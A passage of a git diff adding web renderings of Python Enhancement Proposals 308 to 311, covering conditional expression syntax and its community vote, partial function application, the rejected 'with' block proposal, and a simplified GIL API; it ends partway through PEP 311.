+ + + + + \ No newline at end of file diff --git a/pep-0308/index.html b/pep-0308/index.html new file mode 100644 index 00000000000..a022d4f7fab --- /dev/null +++ b/pep-0308/index.html @@ -0,0 +1,557 @@ + + + + + + + + PEP 308 – Conditional Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 308 – Conditional Expressions

+
+
Author:
+
Guido van Rossum, Raymond Hettinger
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Feb-2003
+
Python-Version:
+
2.5
+
Post-History:
+
07-Feb-2003, 11-Feb-2003
+
+
+
+
Table of Contents +
+
+

Adding a conditional expression

+

On 9/29/2005, Guido decided to add conditional expressions in the +form of “X if C else Y”. [1]

+

The motivating use case was the prevalence of error-prone attempts +to achieve the same effect using “and” and “or”. [2]

+

Previous community efforts to add a conditional expression were +stymied by a lack of consensus on the best syntax. That issue was +resolved by simply deferring to a BDFL best judgment call.

+

The decision was validated by reviewing how the syntax fared when +applied throughout the standard library (this review approximates a +sampling of real-world use cases, across a variety of applications, +written by a number of programmers with diverse backgrounds). [3]

+

The following change will be made to the grammar. (The or_test +symbols is new, the others are modified.)

+
test: or_test ['if' or_test 'else' test] | lambdef
+or_test: and_test ('or' and_test)*
+...
+testlist_safe: or_test [(',' or_test)+ [',']]
+...
+gen_for: 'for' exprlist 'in' or_test [gen_iter]
+
+
+

The new syntax nearly introduced a minor syntactical backwards +incompatibility. In previous Python versions, the following is +legal:

+
[f for f in lambda x: x, lambda x: x**2 if f(1) == 1]
+
+
+

(I.e. a list comprehension where the sequence following ‘in’ is an +unparenthesized series of lambdas – or just one lambda, even.)

+

In Python 3.0, the series of lambdas will have to be +parenthesized, e.g.:

+
[f for f in (lambda x: x, lambda x: x**2) if f(1) == 1]
+
+
+

This is because lambda binds less tight than the if-else +expression, but in this context, the lambda could already be +followed by an ‘if’ keyword that binds less tightly still (for +details, consider the grammar changes shown above).

+

However, in Python 2.5, a slightly different grammar is used that +is more backwards compatible, but constrains the grammar of a +lambda used in this position by forbidding the lambda’s body to +contain an unparenthesized condition expression. Examples:

+
[f for f in (1, lambda x: x if x >= 0 else -1)]    # OK
+[f for f in 1, (lambda x: x if x >= 0 else -1)]    # OK
+[f for f in 1, lambda x: (x if x >= 0 else -1)]    # OK
+[f for f in 1, lambda x: x if x >= 0 else -1]      # INVALID
+
+
+
+
+

References

+ +
+
+

Introduction to earlier draft of the PEP (kept for historical purposes)

+

Requests for an if-then-else (“ternary”) expression keep coming up +on comp.lang.python. This PEP contains a concrete proposal of a +fairly Pythonic syntax. This is the community’s one chance: if +this PEP is approved with a clear majority, it will be implemented +in Python 2.4. If not, the PEP will be augmented with a summary +of the reasons for rejection and the subject better not come up +again. While the BDFL is co-author of this PEP, he is neither in +favor nor against this proposal; it is up to the community to +decide. If the community can’t decide, the BDFL will reject the +PEP.

+

After unprecedented community response (very good arguments were +made both pro and con) this PEP has been revised with the help of +Raymond Hettinger. Without going through a complete revision +history, the main changes are a different proposed syntax, an +overview of proposed alternatives, the state of the current +discussion, and a discussion of short-circuit behavior.

+

Following the discussion, a vote was held. While there was an overall +interest in having some form of if-then-else expressions, no one +format was able to draw majority support. Accordingly, the PEP was +rejected due to the lack of an overwhelming majority for change. +Also, a Python design principle has been to prefer the status quo +whenever there are doubts about which path to take.

+
+
+

Proposal

+

The proposed syntax is as follows:

+
(if <condition>: <expression1> else: <expression2>)
+
+
+

Note that the enclosing parentheses are not optional.

+

The resulting expression is evaluated like this:

+
    +
  • First, <condition> is evaluated.
  • +
  • If <condition> is true, <expression1> is evaluated and is the +result of the whole thing.
  • +
  • If <condition> is false, <expression2> is evaluated and is the +result of the whole thing.
  • +
+

A natural extension of this syntax is to allow one or more ‘elif’ +parts:

+
(if <cond1>: <expr1> elif <cond2>: <expr2> ... else: <exprN>)
+
+
+

This will be implemented if the proposal is accepted.

+

The downsides to the proposal are:

+
    +
  • the required parentheses
  • +
  • confusability with statement syntax
  • +
  • additional semantic loading of colons
  • +
+

Note that at most one of <expression1> and <expression2> is +evaluated. This is called a “short-circuit expression”; it is +similar to the way the second operand of ‘and’ / ‘or’ is only +evaluated if the first operand is true / false.

+

A common way to emulate an if-then-else expression is:

+
<condition> and <expression1> or <expression2>
+
+
+

However, this doesn’t work the same way: it returns <expression2> +when <expression1> is false! See FAQ 4.16 for alternatives that +work – however, they are pretty ugly and require much more effort +to understand.

+
+
+

Alternatives

+

Holger Krekel proposed a new, minimally invasive variant:

+
<condition> and <expression1> else <expression2>
+
+
+

The concept behind it is that a nearly complete ternary operator +already exists with and/or and this proposal is the least invasive +change that makes it complete. Many respondants on the +newsgroup found this to be the most pleasing alternative. +However, a couple of respondants were able to post examples +that were mentally difficult to parse. Later it was pointed +out that this construct works by having the “else” change the +existing meaning of “and”.

+

As a result, there is increasing support for Christian Tismer’s +proposed variant of the same idea:

+
<condition> then <expression1> else <expression2>
+
+
+

The advantages are simple visual parsing, no required parentheses, +no change in the semantics of existing keywords, not as likely +as the proposal to be confused with statement syntax, and does +not further overload the colon. The disadvantage is the +implementation costs of introducing a new keyword. However, +unlike other new keywords, the word “then” seems unlikely to +have been used as a name in existing programs.

+

+

Many C-derived languages use this syntax:

+
<condition> ? <expression1> : <expression2>
+
+
+

Eric Raymond even implemented this. The BDFL rejected this for +several reasons: the colon already has many uses in Python (even +though it would actually not be ambiguous, because the question +mark requires a matching colon); for people not used to C-derived +language, it is hard to understand.

+

+

The original version of this PEP proposed the following syntax:

+
<expression1> if <condition> else <expression2>
+
+
+

The out-of-order arrangement was found to be too uncomfortable +for many of participants in the discussion; especially when +<expression1> is long, it’s easy to miss the conditional while +skimming.

+

+

Some have suggested adding a new builtin instead of extending the +syntax of the language. For example:

+
cond(<condition>, <expression1>, <expression2>)
+
+
+

This won’t work the way a syntax extension will because both +expression1 and expression2 must be evaluated before the function +is called. There’s no way to short-circuit the expression +evaluation. It could work if ‘cond’ (or some other name) were +made a keyword, but that has all the disadvantages of adding a new +keyword, plus confusing syntax: it looks like a function call so +a casual reader might expect both <expression1> and <expression2> +to be evaluated.

+
+
+

Summary of the Current State of the Discussion

+

Groups are falling into one of three camps:

+
    +
  1. Adopt a ternary operator built using punctuation characters:
    <condition> ? <expression1> : <expression2>
    +
    +
    +
  2. +
  3. Adopt a ternary operator built using new or existing keywords. +The leading examples are:
    <condition> then <expression1> else <expression2>
    +(if <condition>: <expression1> else: <expression2>)
    +
    +
    +
  4. +
  5. Do nothing.
  6. +
+

The first two positions are relatively similar.

+

Some find that any form of punctuation makes the language more +cryptic. Others find that punctuation style is appropriate for +expressions rather than statements and helps avoid a COBOL style: +3 plus 4 times 5.

+

Adapting existing keywords attempts to improve on punctuation +through explicit meaning and a more tidy appearance. The downside +is some loss of the economy-of-expression provided by punctuation +operators. The other downside is that it creates some degree of +confusion between the two meanings and two usages of the keywords.

+

Those difficulties are overcome by options which introduce new +keywords which take more effort to implement.

+

The last position is doing nothing. Arguments in favor include +keeping the language simple and concise; maintaining backwards +compatibility; and that any every use case can already be already +expressed in terms of “if” and “else”. Lambda expressions are an +exception as they require the conditional to be factored out into +a separate function definition.

+

The arguments against doing nothing are that the other choices +allow greater economy of expression and that current practices +show a propensity for erroneous uses of “and”, “or”, or one their +more complex, less visually unappealing workarounds.

+
+
+

Short-Circuit Behavior

+

The principal difference between the ternary operator and the +cond() function is that the latter provides an expression form but +does not provide short-circuit evaluation.

+

Short-circuit evaluation is desirable on three occasions:

+
    +
  1. When an expression has side-effects
  2. +
  3. When one or both of the expressions are resource intensive
  4. +
  5. When the condition serves as a guard for the validity of the +expression.
  6. +
+
#  Example where all three reasons apply
+data = isinstance(source, file)  ?  source.readlines()
+                                 :  source.split()
+
+
+
    +
  1. readlines() moves the file pointer
  2. +
  3. for long sources, both alternatives take time
  4. +
  5. split() is only valid for strings and readlines() is only +valid for file objects.
  6. +
+

Supporters of a cond() function point out that the need for +short-circuit evaluation is rare. Scanning through existing code +directories, they found that if/else did not occur often; and of +those only a few contained expressions that could be helped by +cond() or a ternary operator; and that most of those had no need +for short-circuit evaluation. Hence, cond() would suffice for +most needs and would spare efforts to alter the syntax of the +language.

+

More supporting evidence comes from scans of C code bases which +show that its ternary operator used very rarely (as a percentage +of lines of code).

+

A counterpoint to that analysis is that the availability of a +ternary operator helped the programmer in every case because it +spared the need to search for side-effects. Further, it would +preclude errors arising from distant modifications which introduce +side-effects. The latter case has become more of a reality with +the advent of properties where even attribute access can be given +side-effects.

+

The BDFL’s position is that short-circuit behavior is essential +for an if-then-else construct to be added to the language.

+
+
+

Detailed Results of Voting

+
Votes rejecting all options:  82
+Votes with rank ordering:     436
+                              ---
+Total votes received:         518
+
+
+        ACCEPT                  REJECT                  TOTAL
+        ---------------------   ---------------------   -----
+        Rank1   Rank2   Rank3   Rank1   Rank2   Rank3
+Letter
+A       51      33      19      18      20      20      161
+B       45      46      21      9       24      23      168
+C       94      54      29      20      20      18      235
+D       71      40      31      5       28      31      206
+E       7       7       10              3       5       32
+F       14      19      10              7       17      67
+G       7       6       10      1       2       4       30
+H       20      22      17      4       10      25      98
+I       16      20      9       5       5       20      75
+J       6       17      5       1               10      39
+K       1               6               4       13      24
+L               1       2               3       3       9
+M       7       3       4       2       5       11      32
+N               2       3               4       2       11
+O       1       6       5       1       4       9       26
+P       5       3       6       1       5       7       27
+Q       18      7       15      6       5       11      62
+Z                                               1       1
+        ---     ---     ---     ---     ---     ---     ----
+Total   363     286     202     73      149     230     1303
+RejectAll                       82      82      82      246
+        ---     ---     ---     ---     ---     ---     ----
+Total   363     286     202     155     231     312     1549
+
+
+
+

CHOICE KEY

+
A.  x if C else y
+B.  if C then x else y
+C.  (if C: x else: y)
+D.  C ? x : y
+E.  C ? x ! y
+F.  cond(C, x, y)
+G.  C ?? x || y
+H.  C then x else y
+I.  x when C else y
+J.  C ? x else y
+K.  C -> x else y
+L.  C -> (x, y)
+M.  [x if C else y]
+N.  ifelse C: x else y
+O.  <if C then x else y>
+P.  C and x else y
+Q.  any write-in vote
+
+
+
+
+

Detail for write-in votes and their ranking

+
3:  Q reject y x C elsethenif
+2:  Q accept (C ? x ! y)
+3:  Q reject ...
+3:  Q accept  ? C : x : y
+3:  Q accept (x if C, y otherwise)
+3:  Q reject ...
+3:  Q reject NONE
+1:  Q accept   select : (<c1> : <val1>; [<cx> : <valx>; ]* elseval)
+2:  Q reject if C: t else: f
+3:  Q accept C selects x else y
+2:  Q accept iff(C, x, y)    # "if-function"
+1:  Q accept (y, x)[C]
+1:  Q accept          C true: x false: y
+3:  Q accept          C then: x else: y
+3:  Q reject
+3:  Q accept (if C: x elif C2: y else: z)
+3:  Q accept C -> x : y
+1:  Q accept  x (if C), y
+1:  Q accept if c: x else: y
+3:  Q accept (c).{True:1, False:2}
+2:  Q accept if c: x else: y
+3:  Q accept (c).{True:1, False:2}
+3:  Q accept if C: x else y
+1:  Q accept  (x if C else y)
+1:  Q accept ifelse(C, x, y)
+2:  Q reject x or y <- C
+1:  Q accept (C ? x : y) required parens
+1:  Q accept  iif(C, x, y)
+1:  Q accept ?(C, x, y)
+1:  Q accept switch-case
+2:  Q accept multi-line if/else
+1:  Q accept C: x else: y
+2:  Q accept (C): x else: y
+3:  Q accept if C: x else: y
+1:  Q accept     x if C, else y
+1:  Q reject choice: c1->a; c2->b; ...; z
+3:  Q accept [if C then x else y]
+3:  Q reject no other choice has x as the first element
+1:  Q accept (x,y) ? C
+3:  Q accept x if C else y (The "else y" being optional)
+1:  Q accept (C ? x , y)
+1:  Q accept  any outcome (i.e form or plain rejection) from a usability study
+1:  Q reject (x if C else y)
+1:  Q accept  (x if C else y)
+2:  Q reject   NONE
+3:  Q reject   NONE
+3:  Q accept  (C ? x else y)
+3:  Q accept  x when C else y
+2:  Q accept  (x if C else y)
+2:  Q accept cond(C1, x1, C2, x2, C3, x3,...)
+1:  Q accept  (if C1: x elif C2: y else: z)
+1:  Q reject cond(C, :x, :y)
+3:  Q accept  (C and [x] or [y])[0]
+2:  Q reject
+3:  Q reject
+3:  Q reject all else
+1:  Q reject no-change
+3:  Q reject deliberately omitted as I have no interest in any other proposal
+2:  Q reject (C then x else Y)
+1:  Q accept       if C: x else: y
+1:  Q reject (if C then x else y)
+3:  Q reject C?(x, y)
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0308.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0309/index.html b/pep-0309/index.html new file mode 100644 index 00000000000..b1f9d53de54 --- /dev/null +++ b/pep-0309/index.html @@ -0,0 +1,386 @@ + + + + + + + + PEP 309 – Partial Function Application | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 309 – Partial Function Application

+
+
Author:
+
Peter Harris <scav at blueyonder.co.uk>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Feb-2003
+
Python-Version:
+
2.5
+
Post-History:
+
10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006
+
+
+
+
Table of Contents +
+
+

Note

+

Following the acceptance of this PEP, further discussion on python-dev and +comp.lang.python revealed a desire for several tools that operated on +function objects, but were not related to functional programming. Rather +than create a new module for these tools, it was agreed [1] that the +“functional” module be renamed to “functools” to reflect its newly-widened +focus.

+

References in this PEP to a “functional” module have been left in for +historical reasons.

+
+
+

Abstract

+

This proposal is for a function or callable class that allows a new +callable to be constructed from a callable and a partial argument list +(including positional and keyword arguments).

+

I propose a standard library module called “functional”, to hold +useful higher-order functions, including the implementation of +partial().

+

An implementation has been submitted to SourceForge [2].

+
+
+

Acceptance

+

Patch #941881 was accepted and applied in 2005 for Py2.5. It is +essentially as outlined here, a partial() type constructor binding +leftmost positional arguments and any keywords. The partial object has +three read-only attributes func, args, and keywords. Calls to the partial +object can specify keywords that override those in the object itself.

+

There is a separate and continuing discussion of whether to modify the +partial implementation with a __get__ method to more closely emulate +the behavior of an equivalent function.

+
+
+

Motivation

+

In functional programming, function currying is a way of implementing +multi-argument functions in terms of single-argument functions. A +function with N arguments is really a function with 1 argument that +returns another function taking (N-1) arguments. Function application +in languages like Haskell and ML works such that a function call:

+
f x y z
+
+
+

actually means:

+
(((f x) y) z)
+
+
+

This would be only an obscure theoretical issue except that in actual +programming it turns out to be very useful. Expressing a function in +terms of partial application of arguments to another function can be +both elegant and powerful, and in functional languages it is heavily +used.

+

In some functional languages, (e.g. Miranda) you can use an expression +such as (+1) to mean the equivalent of Python’s +(lambda x: x + 1).

+

In general, languages like that are strongly typed, so the compiler +always knows the number of arguments expected and can do the right +thing when presented with a functor and less arguments than expected.

+

Python does not implement multi-argument functions by currying, so if +you want a function with partially-applied arguments you would +probably use a lambda as above, or define a named function for each +instance.

+

However, lambda syntax is not to everyone’s taste, so say the least. +Furthermore, Python’s flexible parameter passing using both positional +and keyword presents an opportunity to generalise the idea of partial +application and do things that lambda cannot.

+
+
+

Example Implementation

+

Here is one way to do a create a callable with partially-applied +arguments in Python. The implementation below is based on improvements +provided by Scott David Daniels:

+
class partial(object):
+
+    def __init__(*args, **kw):
+        self = args[0]
+        self.fn, self.args, self.kw = (args[1], args[2:], kw)
+
+    def __call__(self, *args, **kw):
+        if kw and self.kw:
+            d = self.kw.copy()
+            d.update(kw)
+        else:
+            d = kw or self.kw
+        return self.fn(*(self.args + args), **d)
+
+
+

(A recipe similar to this has been in the Python Cookbook for some +time [3].)

+

Note that when the object is called as though it were a function, +positional arguments are appended to those provided to the +constructor, and keyword arguments override and augment those provided +to the constructor.

+

Positional arguments, keyword arguments or both can be supplied at +when creating the object and when calling it.

+
+
+

Examples of Use

+

So partial(operator.add, 1) is a bit like (lambda x: 1 + x). +Not an example where you see the benefits, of course.

+

Note too, that you could wrap a class in the same way, since classes +themselves are callable factories for objects. So in some cases, +rather than defining a subclass, you can specialise classes by partial +application of the arguments to the constructor.

+

For example, partial(Tkinter.Label, fg='blue') makes Tkinter +Labels that have a blue foreground by default.

+

Here’s a simple example that uses partial application to construct +callbacks for Tkinter widgets on the fly:

+
from Tkinter import Tk, Canvas, Button
+import sys
+from functional import partial
+
+win = Tk()
+c = Canvas(win,width=200,height=50)
+c.pack()
+
+for colour in sys.argv[1:]:
+    b = Button(win, text=colour,
+               command=partial(c.config, bg=colour))
+    b.pack(side='left')
+
+win.mainloop()
+
+
+
+
+

Abandoned Syntax Proposal

+

I originally suggested the syntax fn@(*args, **kw), meaning the +same as partial(fn, *args, **kw).

+

The @ sign is used in some assembly languages to imply register +indirection, and the use here is also a kind of indirection. +f@(x) is not f(x), but a thing that becomes f(x) when you +call it.

+

It was not well-received, so I have withdrawn this part of the +proposal. In any case, @ has been taken for the new decorator syntax.

+
+
+

Feedback from comp.lang.python and python-dev

+

Among the opinions voiced were the following (which I summarise):

+
    +
  • Lambda is good enough.
  • +
  • The @ syntax is ugly (unanimous).
  • +
  • It’s really a curry rather than a closure. There is an almost +identical implementation of a curry class on ActiveState’s Python +Cookbook.
  • +
  • A curry class would indeed be a useful addition to the standard +library.
  • +
  • It isn’t function currying, but partial application. Hence the +name is now proposed to be partial().
  • +
  • It maybe isn’t useful enough to be in the built-ins.
  • +
  • The idea of a module called functional was well received, and +there are other things that belong there (for example function +composition).
  • +
  • For completeness, another object that appends partial arguments +after those supplied in the function call (maybe called +rightcurry) has been suggested.
  • +
+

I agree that lambda is usually good enough, just not always. And I +want the possibility of useful introspection and subclassing.

+

I disagree that @ is particularly ugly, but it may be that I’m just +weird. We have dictionary, list and tuple literals neatly +differentiated by special punctuation – a way of directly expressing +partially-applied function literals is not such a stretch. However, +not one single person has said they like it, so as far as I’m +concerned it’s a dead parrot.

+

I concur with calling the class partial rather than curry or closure, +so I have amended the proposal in this PEP accordingly. But not +throughout: some incorrect references to ‘curry’ have been left in +since that’s where the discussion was at the time.

+

Partially applying arguments from the right, or inserting arguments at +arbitrary positions creates its own problems, but pending discovery of +a good implementation and non-confusing semantics, I don’t think it +should be ruled out.

+

Carl Banks posted an implementation as a real functional closure:

+
def curry(fn, *cargs, **ckwargs):
+    def call_fn(*fargs, **fkwargs):
+        d = ckwargs.copy()
+        d.update(fkwargs)
+        return fn(*(cargs + fargs), **d)
+    return call_fn
+
+
+

which he assures me is more efficient.

+

I also coded the class in Pyrex, to estimate how the performance +might be improved by coding it in C:

+
cdef class curry:
+
+    cdef object fn, args, kw
+
+    def __init__(self, fn, *args, **kw):
+        self.fn=fn
+        self.args=args
+        self.kw = kw
+
+    def __call__(self, *args, **kw):
+        if self.kw:        # from Python Cookbook version
+            d = self.kw.copy()
+            d.update(kw)
+        else:
+            d=kw
+        return self.fn(*(self.args + args), **d)
+
+
+

The performance gain in Pyrex is less than 100% over the nested +function implementation, since to be fully general it has to operate +by Python API calls. For the same reason, a C implementation will be +unlikely to be much faster, so the case for a built-in coded in C is +not very strong.

+
+
+

Summary

+

I prefer that some means to partially-apply functions and other +callables should be present in the standard library.

+

A standard library module functional should contain an +implementation of partial, and any other higher-order functions +the community want. Other functions that might belong there fall +outside the scope of this PEP though.

+

Patches for the implementation, documentation and unit tests (SF +patches 931005, 931007, and 931010 respectively) have been +submitted but not yet checked in.

+

A C implementation by Hye-Shik Chang has also been submitted, although +it is not expected to be included until after the Python +implementation has proven itself useful enough to be worth optimising.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0309.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0310/index.html b/pep-0310/index.html new file mode 100644 index 00000000000..6a86833a0d9 --- /dev/null +++ b/pep-0310/index.html @@ -0,0 +1,362 @@ + + + + + + + + PEP 310 – Reliable Acquisition/Release Pairs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 310 – Reliable Acquisition/Release Pairs

+
+
Author:
+
Michael Hudson <mwh at python.net>, +Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Dec-2002
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

It would be nice to have a less typing-intense way of writing:

+
the_lock.acquire()
+try:
+    ....
+finally:
+    the_lock.release()
+
+
+

This PEP proposes a piece of syntax (a ‘with’ block) and a +“small-i” interface that generalizes the above.

+
+
+

Pronouncement

+

This PEP is rejected in favor of PEP 343.

+
+
+

Rationale

+

One of the advantages of Python’s exception handling philosophy is +that it makes it harder to do the “wrong” thing (e.g. failing to +check the return value of some system call). Currently, this does +not apply to resource cleanup. The current syntax for acquisition +and release of a resource (for example, a lock) is:

+
the_lock.acquire()
+try:
+    ....
+finally:
+    the_lock.release()
+
+
+

This syntax separates the acquisition and release by a (possibly +large) block of code, which makes it difficult to confirm “at a +glance” that the code manages the resource correctly. Another +common error is to code the “acquire” call within the try block, +which incorrectly releases the lock if the acquire fails.

+
+
+

Basic Syntax and Semantics

+

The syntax of a ‘with’ statement is as follows:

+
'with' [ var '=' ] expr ':'
+    suite
+
+
+

This statement is defined as being equivalent to the following +sequence of statements:

+
var = expr
+
+if hasattr(var, "__enter__"):
+    var.__enter__()
+
+try:
+    suite
+
+finally:
+    var.__exit__()
+
+
+

(The presence of an __exit__ method is not checked like that of +__enter__ to ensure that using inappropriate objects in with: +statements gives an error).

+

If the variable is omitted, an unnamed object is allocated on the +stack. In that case, the suite has no access to the unnamed object.

+
+
+

Possible Extensions

+

A number of potential extensions to the basic syntax have been +discussed on the Python Developers list. None of these extensions +are included in the solution proposed by this PEP. In many cases, +the arguments are nearly equally strong in both directions. In +such cases, the PEP has always chosen simplicity, simply because +where extra power is needed, the existing try block is available.

+
+

Multiple expressions

+

One proposal was for allowing multiple expressions within one +‘with’ statement. The __enter__ methods would be called left to +right, and the __exit__ methods right to left. The advantage of +doing so is that where more than one resource is being managed, +nested ‘with’ statements will result in code drifting towards the +right margin. The solution to this problem is the same as for any +other deep nesting - factor out some of the code into a separate +function. Furthermore, the question of what happens if one of the +__exit__ methods raises an exception (should the other __exit__ +methods be called?) needs to be addressed.

+
+
+

Exception handling

+

An extension to the protocol to include an optional __except__ +handler, which is called when an exception is raised, and which +can handle or re-raise the exception, has been suggested. It is +not at all clear that the semantics of this extension can be made +precise and understandable. For example, should the equivalent +code be try ... except ... else if an exception handler is +defined, and try ... finally if not? How can this be determined +at compile time, in general? The alternative is to define the +code as expanding to a try ... except inside a try ... finally. +But this may not do the right thing in real life.

+

The only use case identified for exception handling is with +transactional processing (commit on a clean finish, and rollback +on an exception). This is probably just as easy to handle with a +conventional try ... except ... else block, and so the PEP does +not include any support for exception handlers.

+
+
+
+

Implementation Notes

+

There is a potential race condition in the code specified as +equivalent to the with statement. For example, if a +KeyboardInterrupt exception is raised between the completion of +the __enter__ method call and the start of the try block, the +__exit__ method will not be called. This can lead to resource +leaks, or to deadlocks. [XXX Guido has stated that he cares about +this sort of race condition, and intends to write some C magic to +handle them. The implementation of the ‘with’ statement should +copy this.]

+
+
+

Open Issues

+

Should existing classes (for example, file-like objects and locks) +gain appropriate __enter__ and __exit__ methods? The obvious +reason in favour is convenience (no adapter needed). The argument +against is that if built-in files have this but (say) StringIO +does not, then code that uses “with” on a file object can’t be +reused with a StringIO object. So __exit__ = close becomes a part +of the “file-like object” protocol, which user-defined classes may +need to support.

+

The __enter__ hook may be unnecessary - for many use cases, an +adapter class is needed and in that case, the work done by the +__enter__ hook can just as easily be done in the __init__ hook.

+

If a way of controlling object lifetimes explicitly was available, +the function of the __exit__ hook could be taken over by the +existing __del__ hook. An email exchange [1] with a proponent of +this approach left one of the authors even more convinced that +it isn’t the right idea…

+

It has been suggested [2] that the “__exit__” method be called +“close”, or that a “close” method should be considered if no +__exit__ method is found, to increase the “out-of-the-box utility” +of the “with …” construct.

+

There are some similarities in concept between ‘with …’ blocks +and generators, which have led to proposals that for loops could +implement the with block functionality [3]. While neat on some +levels, we think that for loops should stick to being loops.

+
+
+

Alternative Ideas

+

IEXEC: Holger Krekel – generalised approach with XML-like syntax +(no URL found…).

+

Holger has much more far-reaching ideas about “execution monitors” +that are informed about details of control flow in the monitored +block. While interesting, these ideas could change the language +in deep and subtle ways and as such belong to a different PEP.

+

Any Smalltalk/Ruby anonymous block style extension obviously +subsumes this one.

+

PEP 319 is in the same area, but did not win support when aired on +python-dev.

+
+
+

Backwards Compatibility

+

This PEP proposes a new keyword, so the __future__ game will need +to be played.

+
+
+

Cost of Adoption

+

Those who claim the language is getting larger and more +complicated have something else to complain about. It’s something +else to teach.

+

For the proposal to be useful, many file-like and lock-like +classes in the standard library and other code will have to have

+
__exit__ = close
+
+
+

or similar added.

+
+
+

Cost of Non-Adoption

+

Writing correct code continues to be more effort than writing +incorrect code.

+
+
+

References

+

There are various python-list and python-dev discussions that +could be mentioned here.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0310.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0311/index.html b/pep-0311/index.html new file mode 100644 index 00000000000..1e5862db8fb --- /dev/null +++ b/pep-0311/index.html @@ -0,0 +1,347 @@ + + + + + + + + PEP 311 – Simplified Global Interpreter Lock Acquisition for Extensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 311 – Simplified Global Interpreter Lock Acquisition for Extensions

+
+
Author:
+
Mark Hammond <mhammond at skippinet.com.au>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Feb-2003
+
Python-Version:
+
2.3
+
Post-History:
+
05-Feb-2003, 14-Feb-2003, 19-Apr-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a simplified API for access to the Global +Interpreter Lock (GIL) for Python extension modules. +Specifically, it provides a solution for authors of complex +multi-threaded extensions, where the current state of Python +(i.e., the state of the GIL is unknown.

+

This PEP proposes a new API, for platforms built with threading +support, to manage the Python thread state. An implementation +strategy is proposed, along with an initial, platform independent +implementation.

+
+
+

Rationale

+

The current Python interpreter state API is suitable for simple, +single-threaded extensions, but quickly becomes incredibly complex +for non-trivial, multi-threaded extensions.

+

Currently Python provides two mechanisms for dealing with the GIL:

+
    +
  • Py_BEGIN_ALLOW_THREADS and Py_END_ALLOW_THREADS macros. +These macros are provided primarily to allow a simple Python +extension that already owns the GIL to temporarily release it +while making an “external” (ie, non-Python), generally +expensive, call. Any existing Python threads that are blocked +waiting for the GIL are then free to run. While this is fine +for extensions making calls from Python into the outside world, +it is no help for extensions that need to make calls into Python +when the thread state is unknown.
  • +
  • PyThreadState and PyInterpreterState APIs. +These API functions allow an extension/embedded application to +acquire the GIL, but suffer from a serious boot-strapping +problem - they require you to know the state of the Python +interpreter and of the GIL before they can be used. One +particular problem is for extension authors that need to deal +with threads never before seen by Python, but need to call +Python from this thread. It is very difficult, delicate and +error prone to author an extension where these “new” threads +always know the exact state of the GIL, and therefore can +reliably interact with this API.
  • +
+

For these reasons, the question of how such extensions should +interact with Python is quickly becoming a FAQ. The main impetus +for this PEP, a thread on python-dev [1], immediately identified +the following projects with this exact issue:

+
    +
  • The win32all extensions
  • +
  • Boost
  • +
  • ctypes
  • +
  • Python-GTK bindings
  • +
  • Uno
  • +
  • PyObjC
  • +
  • Mac toolbox
  • +
  • PyXPCOM
  • +
+

Currently, there is no reasonable, portable solution to this +problem, forcing each extension author to implement their own +hand-rolled version. Further, the problem is complex, meaning +many implementations are likely to be incorrect, leading to a +variety of problems that will often manifest simply as “Python has +hung”.

+

While the biggest problem in the existing thread-state API is the +lack of the ability to query the current state of the lock, it is +felt that a more complete, simplified solution should be offered +to extension authors. Such a solution should encourage authors to +provide error-free, complex extension modules that take full +advantage of Python’s threading mechanisms.

+
+
+

Limitations and Exclusions

+

This proposal identifies a solution for extension authors with +complex multi-threaded requirements, but that only require a +single “PyInterpreterState”. There is no attempt to cater for +extensions that require multiple interpreter states. At the time +of writing, no extension has been identified that requires +multiple PyInterpreterStates, and indeed it is not clear if that +facility works correctly in Python itself.

+

This API will not perform automatic initialization of Python, or +initialize Python for multi-threaded operation. Extension authors +must continue to call Py_Initialize(), and for multi-threaded +applications, PyEval_InitThreads(). The reason for this is that +the first thread to call PyEval_InitThreads() is nominated as the +“main thread” by Python, and so forcing the extension author to +specify the main thread (by requiring them to make this first call) +removes ambiguity. As Py_Initialize() must be called before +PyEval_InitThreads(), and as both of these functions currently +support being called multiple times, the burden this places on +extension authors is considered reasonable.

+

It is intended that this API be all that is necessary to acquire +the Python GIL. Apart from the existing, standard +Py_BEGIN_ALLOW_THREADS and Py_END_ALLOW_THREADS macros, it is +assumed that no additional thread state API functions will be used +by the extension. Extensions with such complicated requirements +are free to continue to use the existing thread state API.

+
+
+

Proposal

+

This proposal recommends a new API be added to Python to simplify +the management of the GIL. This API will be available on all +platforms built with WITH_THREAD defined.

+

